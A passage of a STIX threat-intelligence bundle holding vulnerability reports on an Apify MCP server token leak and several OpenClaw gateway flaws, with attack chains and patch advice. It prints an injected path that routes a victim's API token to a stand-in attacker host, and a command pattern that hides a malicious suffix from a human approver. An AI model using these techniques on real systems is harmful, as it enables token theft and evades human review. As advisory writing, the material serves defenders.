      "relationship_type": "uses",
      "source_ref": "report--2a9dc048-e8be-5766-a428-d1fa4524cb02",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over C2 Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--412f7355-7e38-5a5d-8777-b3c527838cba",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2a9dc048-e8be-5766-a428-d1fa4524cb02",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--2a9dc048-e8be-5766-a428-d1fa4524cb02",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Apify Model Context Protocol (MCP) server: Actor MCP path authority injection leaks Apify token",
      "description": "## Overview\n\nA critical Server-Side Request Forgery (SSRF) vulnerability, tracked as GHSA-6gr2-qh89-hxwm, exists in `@apify/actors-mcp-server` version `0.10.7` and earlier. This flaw allows an attacker to exfiltrate Apify API tokens from users who interact with a specially crafted malicious Actor. The vulnerability stems from improper validation of the `webServerMcpPath` value, which is sourced from an attacker-controlled Actor definition. By injecting an authority (e.g., `@attacker.example/mcp`) into this path, an attacker can redirect the MCP client's outbound connection to an arbitrary host. Crucially, the MCP client unconditionally attaches the victim's `Authorization: Bearer \u003cAPIFY_TOKEN\u003e` header to these outbound connections, leading to the silent exfiltration of the API token. This grants the attacker full access to the victim's Apify account, enabling actions such as running and managing Actors, accessing stored data, and incurring compute charges, without requiring special privileges or code execution on the victim's machine.\n\n## Attack Chain\n\n1.  An attacker publishes a malicious Actor on the Apify platform, crafting its definition to include a `webServerMcpPath` value designed for URL authority injection (e.g., `@attacker.example/mcp`).\n2.  A victim, running `@apify/actors-mcp-server` (version `0.10.7` or earlier) and configured with an Apify API token, initiates an MCP tool call (e.g., `call-actor` or `fetch-actor-details`) targeting the attacker-controlled Actor.\n3.  The `apifyToken` is resolved from environment variables, server options, or the MCP request's `_meta.apifyToken`.\n4.  The application fetches the attacker's Actor definition from the Apify API, retrieving the malicious `webServerMcpPath`.\n5.  The `getActorMCPServerURL()` function receives the `webServerMcpPath`, trims and splits it, but crucially performs no validation against authority injection.\n6.  The function then concatenates a trusted `standbyUrl` with the malicious `mcpServerPath`, creating an authority-injected URL (e.g., `https://real-actor-id.apify.actor@attacker.example/mcp`).\n7.  The `connectMCPClient()` function is invoked with this crafted URL and the victim's Apify API token.\n8.  The `connectMCPClient()` then establishes an outbound HTTP connection to the attacker's server (`attacker.example`), sending the victim's `Authorization: Bearer \u003cAPIFY_TOKEN\u003e` header, thereby exfiltrating the token.\n\n## Impact\n\nAny user of `@apify/actors-mcp-server` versions prior to `0.10.8` who has an Apify API token configured and is induced to invoke an MCP tool against an attacker-controlled Actor will have their Apify API token silently exfiltrated. The exfiltrated token grants the attacker full administrative access to the victim's Apify account, allowing them to run, manage, and modify Actors, access sensitive data stored within the account, and potentially incur significant compute charges. The attack requires no special privileges on the victim's side and no code execution on their machine, only the interaction with a malicious Actor on the Apify platform, posing a significant risk to the integrity and confidentiality of user accounts.\n\n## Recommendation\n\n*   Immediately update `@apify/actors-mcp-server` to version `0.10.8` or newer to remediate the URL authority injection vulnerability (GHSA-6gr2-qh89-hxwm).\n*   Implement strict outbound network egress filtering to prevent unauthorized connections to unknown or untrusted domains, specifically monitoring for connections from `@apify/actors-mcp-server` processes that contain `Authorization: Bearer` headers directed to domains other than `*.apify.com` or other explicitly allowed Apify infrastructure.\n*   Consider using dedicated network monitoring tools to detect connections to suspicious IP addresses or domains (e.g., `attacker.example` or `127.0.0.1` as seen in PoC) from your Apify infrastructure.\n",
      "published": "2026-07-03T12:22:45Z",
      "labels": [
        "ssp-injection",
        "ssrf",
        "token-exfiltration",
        "npm-package",
        "cloud",
        "saas"
      ],
      "object_refs": [
        "indicator--a1337c8c-6b6e-53be-98f3-f1a7862fda9a",
        "indicator--f798060f-e677-5a1a-8861-e08096dc6e1b",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-6gr2-qh89-hxwm"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2b5b9bda-0544-5fb5-8c43-58ca667bafae",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4d6ea789-46cf-5cce-a11e-55e9461a0e56",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--4d6ea789-46cf-5cce-a11e-55e9461a0e56",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OpenClaw Authorization Bypass Vulnerability (\u003c= 2026.5.5)",
      "description": "## Overview\n\nA critical authorization bypass vulnerability, impacting OpenClaw versions up to and including 2026.5.5, has been disclosed. This flaw allows a sender, who is able to trigger the native command handling mechanism within an OpenClaw Gateway, to bypass the configured owner-only command enforcement policy. This means that commands typically restricted to authorized owners can be executed by unauthorized entities. The vulnerability is significant because it can lead to unauthorized command execution or privilege escalation if the affected feature is enabled and reachable by lower-trust input. It is important to note that this advisory specifically targets a flaw in native command authorization and does not imply a general compromise of OpenClaw's trusted-operator model, which assumes that authenticated Gateway operators and installed plugins remain trusted. The first stable patched version addressing this issue is 2026.5.6.\n\n## Attack Chain\n\n1.  An attacker identifies an OpenClaw Gateway instance running a vulnerable version (\u003c= 2026.5.5) where the native command handling feature is enabled and reachable.\n2.  The attacker crafts a malicious request or command designed to interact with the OpenClaw Gateway's native command handling interface.\n3.  This crafted input is sent to the vulnerable OpenClaw Gateway, triggering the system's native command processing logic.\n4.  Due to the flaw in the authorization mechanism, the Gateway fails to correctly enforce the configured owner-only command policy for the incoming native command.\n5.  The native command, which requires owner-level privileges, is then executed by the OpenClaw Gateway as if it originated from an authorized owner.\n6.  The successful execution of the unauthorized native command leads to the attacker achieving their objective, which could range from unauthorized data modification, system configuration changes, to potentially arbitrary code execution or further privilege escalation within the compromised environment.\n\n## Impact\n\nWhen the affected native command handling feature is enabled and accessible, this vulnerability allows unauthorized entities to execute commands that should be restricted to owner-level access. The practical impact is highly dependent on the specific configuration of the OpenClaw Gateway and the type of sensitive commands an attacker might be able to trigger. Consequences can include unauthorized data access, modification, or deletion, system configuration changes, and potentially arbitrary code execution with the privileges of the OpenClaw process. While specific victim counts are not available, organizations using affected OpenClaw versions should consider their environments at risk if the vulnerable component is exposed to untrusted input.\n\n## Recommendation\n\n*   Upgrade OpenClaw instances to version `2026.5.6` or higher immediately to patch the vulnerability.\n*   As per the brief's mitigation advice, keep native command surfaces limited to trusted senders until patching is complete.\n*   Review and narrow channel and tool allowlists for your OpenClaw Gateway to minimize potential exposure.\n*   Disable the affected native command handling feature when it is not strictly needed to reduce the attack surface.\n",
      "published": "2026-07-03T11:54:07Z",
      "labels": [
        "vulnerability",
        "authorization-bypass",
        "privilege-escalation",
        "openclaw",
        "npm"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-p73f-w79w-jqr5"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5fe90259-0524-5673-a2c3-099ea6e5c4a3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f3c6ac6b-40b2-5a88-9299-7846df694b49",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--02e03fe5-d4a8-584f-8da3-38c1aaf0c812",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f3c6ac6b-40b2-5a88-9299-7846df694b49",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--f3c6ac6b-40b2-5a88-9299-7846df694b49",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OpenClaw Exec Approval Truncation Vulnerability",
      "description": "## Overview\n\nA high-severity vulnerability has been identified in the OpenClaw application, specifically affecting its exec approval display in versions prior to `2026.5.18`. This flaw allows for the truncation of commands presented to an approver within the user interface, while the full command, including any hidden suffixes, is retained for execution. An authenticated attacker can exploit this by submitting a crafted, oversized command where a benign prefix is visible in the UI, but a malicious suffix containing additional shell operations remains hidden. Upon approval, the complete, malicious command is executed. This issue fundamentally undermines the integrity of the approval process by misrepresenting the actual command to be run. While it does not grant unauthenticated access or alter OpenClaw's local-first trust model, it poses a significant risk in deployments where exec approval is enabled, allowing an attacker to effectively bypass human review for potentially dangerous commands.\n\n## Attack Chain\n\n1.  An authenticated attacker crafts a malicious command that is intentionally long, containing a benign-looking prefix and a hidden, malicious suffix with additional shell operations (e.g., `echo \"legit_cmd_output\"; malicious_command_here`).\n2.  The attacker initiates a pending host exec request within OpenClaw, submitting this crafted, oversized command.\n3.  When the command is presented to an approver in the OpenClaw UI, the display truncation vulnerability causes only the benign prefix of the command to be visible.\n4.  The approver, unaware of the hidden malicious suffix, reviews the truncated command and proceeds to authorize its execution.\n5.  Upon successful approval, the OpenClaw system executes the *full* original command, including the hidden malicious suffix, on the target host.\n6.  The `malicious_command_here` from the hidden suffix executes with the privileges of the OpenClaw agent on the target system, potentially leading to unauthorized actions such as data exfiltration, system modification, or further compromise.\n\n## Impact\n\nThe core impact of this vulnerability is a critical failure in the integrity of OpenClaw's exec approval mechanism. An approver, relying on the displayed command, could unknowingly authorize the execution of arbitrary and potentially malicious shell commands on a target system. This effectively bypasses a crucial security control designed to prevent unauthorized or unintended actions. While the advisory does not specify observed exploitation in the wild or provide victim counts, any organization utilizing OpenClaw with exec approval enabled and not running a patched version is vulnerable. The potential damage could range from data manipulation and service disruption to complete system compromise, depending on the nature of the hidden malicious command and the privileges granted to OpenClaw.\n\n## Recommendation\n\n*   Upgrade to `openclaw@2026.5.18` or later immediately to apply the patch for this vulnerability.\n*   Prior to upgrading any systems running OpenClaw versions `\u003c 2026.5.18`, refrain from approving unusually long exec commands to mitigate potential exploitation.\n*   Ensure that OpenClaw exec approval capabilities are strictly limited to highly trusted operators who are aware of the truncation vulnerability.\n",
      "published": "2026-07-03T12:20:49Z",
      "labels": [
        "command-injection",
        "approval-bypass",
        "integrity-compromise",
        "application"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-xww8-gqvh-92x9"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5279b8a8-8e58-5136-8a16-8c2eed74cc35",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd1012e5-2dab-5856-9b48-963e0da4c84b",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--38906d86-77c3-5273-ac7a-72f21a68ae42",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd1012e5-2dab-5856-9b48-963e0da4c84b",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5ff32075-25f3-5210-b19a-e10b664bf4fd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd1012e5-2dab-5856-9b48-963e0da4c84b",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--dd1012e5-2dab-5856-9b48-963e0da4c84b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OpenClaw Vulnerability Allows Loading of Unscanned Payloads via Malicious Metadata",
      "description": "## Overview\n\nA critical vulnerability, CVE-2026-53810, has been identified in `npm/openclaw` versions prior to `2026.5.18`. This flaw resides within the marketplace runtime extension metadata, allowing a malicious package to point to unscanned payloads. When a trusted operator installs such a specially crafted package, the OpenClaw Gateway's runtime loading mechanism can be redirected to execute hidden content that has bypassed expected security scans. This means plugin code could be loaded and executed outside of its reviewed package entry points, creating an avenue for unauthorized code execution. The practical impact hinges on the specific operator's configuration and whether lower-trust input can reach the vulnerable path. While this advisory emphasizes that OpenClaw's trusted-operator model remains, this specific misconfiguration introduces a significant risk if exploited.\n\n## Attack Chain\n\n1.  An attacker crafts a malicious OpenClaw package containing legitimate-looking components alongside hidden malicious code and specially forged marketplace runtime extension metadata.\n2.  The attacker delivers this malicious package (e.g., via social engineering, compromise of a trusted source, or supply chain infiltration) to an organization using OpenClaw Gateway.\n3.  A trusted operator, unaware of the hidden malicious content, initiates the installation of the seemingly benign package within the OpenClaw Gateway environment.\n4.  During the installation process, the vulnerable OpenClaw Gateway (versions prior to `2026.5.18`) processes the malicious marketplace runtime extension metadata.\n5.  Due to CVE-2026-53810, this metadata redirects the runtime loading mechanism to the hidden, unscanned malicious code within the package.\n6.  The OpenClaw Gateway inadvertently loads and executes the malicious plugin code, bypassing its standard security review and scanning procedures.\n7.  The executed malicious code operates within the trusted context of the OpenClaw Gateway, potentially allowing for arbitrary command execution, data exfiltration, or further system compromise.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-53810 could lead to unauthorized code execution within the trusted environment of an OpenClaw Gateway. If the affected feature is enabled and reachable, attackers could leverage this vulnerability to bypass security scans and load arbitrary plugin code, potentially leading to privilege escalation, data theft, or complete system compromise. The severity of the impact depends heavily on the specific configuration of the operator's OpenClaw environment and the sensitivity of the data and systems accessible by the Gateway.\n\n## Recommendation\n\n*   Patch CVE-2026-53810 by immediately upgrading `npm/openclaw` to version `2026.5.18` or higher to remediate the vulnerability.\n*   As a temporary mitigation, implement strict allowlists for all plugins installed on OpenClaw Gateways and explicitly define allowed channels and tools.\n*   Disable the marketplace runtime extension feature if it is not explicitly required for your operational needs to reduce the attack surface.\n*   Avoid sharing a single OpenClaw Gateway between mutually untrusted users or environments as a general hardening measure.\n",
      "published": "2026-07-03T12:18:41Z",
      "labels": [
        "vulnerability",
        "supply-chain",
        "code-execution",
        "nodejs",
        "npm"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-v6r2-jh58-xx6w"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Use Alternate Authentication Material",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1550",
          "url": "https://attack.mitre.org/techniques/T1550"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ac754ea3-e23c-5394-b901-5db09ad38cbf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--adb1f9b4-8593-50ad-b779-a1eda7ca3011",
      "target_ref": "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--adb1f9b4-8593-50ad-b779-a1eda7ca3011",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OpenClaw Vulnerability Allows Local Forged Identity Headers",
      "description": "## Overview\n\nA significant security vulnerability, tracked as GHSA-rggc-m335-3wvj, has been identified in OpenClaw's trusted-proxy deployments, specifically impacting versions prior to `2026.5.18`. This flaw allows a local attacker, operating from the same host where an OpenClaw Gateway instance is running, to forge identity headers. By directly communicating with the proxy-facing Gateway port and presenting these falsified headers, the attacker can effectively bypass the security mechanisms designed for trusted proxies. If the affected feature is active and accessible, this enables the local caller to assume an operator's identity, potentially leading to unauthorized access, configuration changes, or privilege escalation within the OpenClaw environment. This vulnerability is critical for organizations deploying OpenClaw in shared-host or multi-tenant environments where local access by lower-trust processes is possible.\n\n## Attack Chain\n\n1.  **Initial Access**: An attacker gains local access to a system hosting an OpenClaw Gateway instance configured for trusted-proxy deployments. This could be via another compromised application or a low-privilege user account.\n2.  **Discovery**: The attacker probes the local system to identify the specific network port on which the OpenClaw Gateway's proxy-facing service is listening.\n3.  **Direct Connection**: The attacker establishes a direct network connection from their local process to the discovered OpenClaw Gateway port, bypassing the legitimate trusted proxy infrastructure.\n4.  **Header Forgery**: The attacker crafts and sends HTTP requests containing forged identity headers, mimicking those that would normally be generated and supplied by a trusted upstream proxy.\n5.  **Vulnerable Processing**: The affected OpenClaw Gateway instance (versions `\u003c 2026.5.18`) accepts and processes these forged identity headers from the direct local connection without proper validation.\n6.  **Identity Assumption**: The Gateway attributes the operator identity specified in the forged headers to the local attacker's process.\n7.  **Privilege Escalation / Unauthorized Actions**: The attacker, now operating with the assumed operator identity, performs unauthorized actions such as modifying configurations, accessing sensitive data, or escalating privileges within the OpenClaw system.\n\n## Impact\n\nThe successful exploitation of this vulnerability can lead to significant security breaches. If an attacker can successfully forge identity headers, they can impersonate an authorized operator within the OpenClaw environment. The practical impact is highly dependent on the privileges associated with the impersonated operator and the specific configurations of the OpenClaw Gateway. This could result in unauthorized configuration changes, data manipulation or exfiltration, or complete administrative control over the OpenClaw instance. Organizations with shared hosting environments or those running multiple applications on the same server as OpenClaw are particularly at risk, as any compromised local process could leverage this flaw.\n\n## Recommendation\n\n*   **Patch Immediately**: Upgrade all OpenClaw Gateway instances to version `2026.5.18` or newer to remediate the vulnerability described in GHSA-rggc-m335-3wvj.\n*   **Network Segmentation**: Implement network controls to bind the trusted-proxy ingress behind the actual trusted proxy and firewall direct same-host access to the Gateway port, as mentioned in the GHSA-rggc-m335-3wvj mitigations.\n*   **Feature Disablement**: Disable the affected trusted-proxy feature if it is not explicitly required for your operational workflow to reduce the attack surface.\n*   **Access Control**: Ensure that lower-trust applications or users on the same host cannot reach the OpenClaw Gateway's proxy-facing port, following the hardening advice from GHSA-rggc-m335-3wvj.\n",
      "published": "2026-07-03T12:17:46Z",
      "labels": [
        "vulnerability",
        "proxy",
        "privilege-escalation",
        "defense-evasion",
        "npm",
        "server"
      ],
      "object_refs": [
        "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-rggc-m335-3wvj"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Use Alternate Authentication Material",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1550",
          "url": "https://attack.mitre.org/techniques/T1550"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3349512a-2a6e-5f8e-a9d8-80286610e2cd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a2cef796-c819-5b79-88ec-e8dbd5542395",
      "target_ref": "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9bbc07b1-c4bf-546d-90f4-579eee41b27c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a2cef796-c819-5b79-88ec-e8dbd5542395",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--a2cef796-c819-5b79-88ec-e8dbd5542395",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OpenClaw Control UI Locality Spoofing Vulnerability",
      "description": "## Overview\n\nA high-severity authentication bypass vulnerability, identified as CVE-2026-53817, exists in `openclaw` versions prior to `2026.5.22`. This flaw affects deployments leveraging LAN-bound gateways or shared-token Control UI access, where locality signals are implicitly trusted during the pairing process. An attacker who has already established network or authentication foothold to reach the Control UI pairing path can exploit this vulnerability. By spoofing specific locality information, the attacker can trick the system into issuing a durable admin-capable device token. This token provides persistent administrative access, which remains valid even after the initial temporary or shared gateway tokens are rotated. This poses a significant risk as it allows unauthorized, long-term administrative control over affected OpenClaw instances.\n\n## Attack Chain\n\n1.  An attacker gains an initial network or authentication foothold, enabling them to access the OpenClaw Control UI pairing path.\n2.  The attacker initiates a device pairing request to the vulnerable OpenClaw Control UI instance.\n3.  During the pairing process, the attacker crafts and sends requests that include spoofed or manipulated locality information.\n4.  The vulnerable OpenClaw Control UI, versions prior to `2026.5.22`, improperly validates these spoofed locality signals.\n5.  Due to the misinterpretation of the locality signals, the OpenClaw instance grants the attacker a durable admin-capable device token.\n6.  The attacker utilizes this newly acquired durable device token to establish and maintain persistent administrative access to the Control UI.\n7.  This persistent access remains effective even if the original temporary or shared gateway tokens, which might have initially granted the attacker their foothold, are subsequently revoked or rotated.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-53817 can lead to persistent administrative control over affected OpenClaw Control UI instances. The primary observed damage is the ability to transform temporary or shared access into a long-lasting, unauthorized administrative presence. While the specific number of victims or targeted sectors is not provided, any organization utilizing `openclaw` in LAN/shared-token configurations is at risk. If exploited, an attacker gains full administrative capabilities, potentially leading to unauthorized configuration changes, data manipulation, or further compromise of integrated systems managed by the Control UI. The durable nature of the token means access persists even after initial entry vectors are mitigated.\n\n## Recommendation\n\n*   **Patch CVE-2026-53817**: Immediately upgrade affected `openclaw` installations to version `2026.5.22` or later to remediate CVE-2026-53817.\n*   **Implement Network Segmentation**: Ensure that Control UI pairing paths are not exposed on networks accessible to untrusted clients, as described in the summary.\n*   **Review Paired Devices**: For older deployments, regularly review and remove any unexpected or unauthorized paired devices from the Control UI configuration.\n",
      "published": "2026-07-03T12:16:53Z",
      "labels": [
        "authentication",
        "vulnerability",
        "admin-access",
        "persistence",
        "network"
      ],
      "object_refs": [
        "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-chr9-m4q2-76hw"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--09f111f1-98fc-56b1-a6be-7d42d4768f3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--03dda85f-8c6d-5686-a5f6-52c40b149e0e",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--03dda85f-8c6d-5686-a5f6-52c40b149e0e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OpenClaw Trusted-proxy Control UI Privilege Escalation (GHSA-qjpc-qf9m-xwmr)",
      "description": "## Overview\n\nA significant vulnerability has been identified in OpenClaw's trusted-proxy Control UI, designated GHSA-qjpc-qf9m-xwmr. This flaw permits an attacker to bypass authorization mechanisms by declaring elevated operator scopes via a WebSocket connection, even if their device identity is unpaired or restricted. Specifically, the system accepts these client-declared scopes before validating them against a server-approved pairing or trusted-proxy authorization baseline. This can lead to a temporary privilege escalation, granting `operator.admin` authority which allows the execution of administrative Gateway RPCs. The issue affects OpenClaw deployments configured with `gateway.auth.mode: \"trusted-proxy\"` and impacts versions prior to `2026.5.18`. Defenders must prioritize upgrading to the patched version to prevent unauthorized access and potential system compromise.\n\n## Attack Chain\n\n1.  An attacker gains or establishes a connection to a trusted-proxy Control UI client with either an unpaired device identity or a restricted trusted-proxy user account.\n2.  The attacker opens a WebSocket connection to the OpenClaw gateway using this client.\n3.  During the WebSocket handshake or early communication, the attacker's client declares elevated operator scopes, such as `operator.admin`, for its session.\n4.  The OpenClaw gateway, due to the vulnerability, accepts these client-declared scopes without immediately verifying them against the pre-established trusted-proxy authorization policy or a server-approved pairing.\n5.  The attacker temporarily obtains cached `operator.admin` authority on their live WebSocket connection, despite their actual authorization level.\n6.  Using this elevated authority, the attacker executes admin-gated Gateway RPCs, potentially performing unauthorized administrative actions.\n7.  The administrative authority persists until the WebSocket connection is closed or the gateway performs a revalidation of the client's scopes.\n\n## Impact\n\nThis vulnerability can lead to unauthorized administrative control over the OpenClaw gateway. An attacker exploiting this flaw could execute any `operator.admin`-gated RPCs, potentially leading to configuration changes, data manipulation, or denial of service within the 